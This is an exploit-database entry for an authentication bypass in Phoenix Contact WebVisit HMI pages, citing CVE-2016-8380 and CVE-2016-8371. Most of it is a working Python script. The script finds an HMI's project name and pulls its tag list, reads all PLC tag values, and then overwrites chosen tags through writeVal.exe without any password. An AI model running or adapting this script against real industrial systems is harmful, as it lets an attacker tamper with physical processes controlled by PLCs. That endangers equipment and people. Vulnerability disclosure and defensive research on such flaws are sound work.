Phoenix Contact WebVisit 2985725 Authentication Bypass

2018.10.13
Credit: Deneut Tijl
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass # Date: 2018-09-30 # Exploit Author: Deneut Tijl # Vendor Homepage: www.phoenixcontact.com # Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5 # Version: WebVisit (all versions) # CVE : CVE-2016-8380, CVE-2016-8371 # Description # Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection) # Steps: # * Get Project Name: http://<ip>/ # * Get list of tags: http://<ip>/<projectname>.tcr # * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe # * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!) # CVE-2016-8380-SetPLCValues.py #! /usr/bin/env python import urllib2 strIP = raw_input('Please enter an IP [192.168.1.200]: ') if strIP == '': strIP = '192.168.1.200' try: URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/')) except urllib2.HTTPError: print('#### Critical Error with IP ' + strIP + ': no response') raw_input('Press Enter to exit') exit() strProject = '' for line in URLResponse.readlines(): if 'ProjectName' in line: strProject = line.split('VALUE="')[1].split('"')[0] if strProject == '': print('#### Error, no \'ProjectName\' found on the main page') raw_input('Press Enter to exit') exit() print('---- Found project \'' + strProject + '\', retrieving list of tags') try: TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr')) except urllib2.HTTPError: print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found') raw_input('Press Enter to exit') exit() arrTagList = [] for line in TagResponse.readlines(): if line.startswith('#!-- N ='): intNumberOfTags = int(line.split('=')[1]) print('---- There should be ' + str(intNumberOfTags) + ' tags:') if not line.startswith('#'): if not line.split(';')[0].strip() == '': arrTagList.append(line.split(';')[0].strip()) print('-- '+line.split(';')[0].strip()) raw_input('Press Enter to query them all') import os, urllib os.system('cls' if os.name == 'nt' else 'clear') strPost = '<body>' strPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>' strPost += '<item_list>' for item in arrTagList: strPost += '<i><n>' + item + '</n></i>' strPost += '</item_list></body>' DataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read() arrData = [] for item in DataResponse.split('<i>'): if '<n>' in item: name = item.split('<n>')[1].split('</n>')[0] value = item.split('<v>')[1].split('</v>')[0] arrData.append((name,value)) print('----- Full list of tags and their values:') i = 0 for item in arrData: i += 1 print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1]) ans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ') if ans1 == '': exit() strTag = arrData[int(ans1) - 1][0] strVal = arrData[int(ans1) - 1][1] ans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ') if ans2 == '': ans2 = strVal urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2)))


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top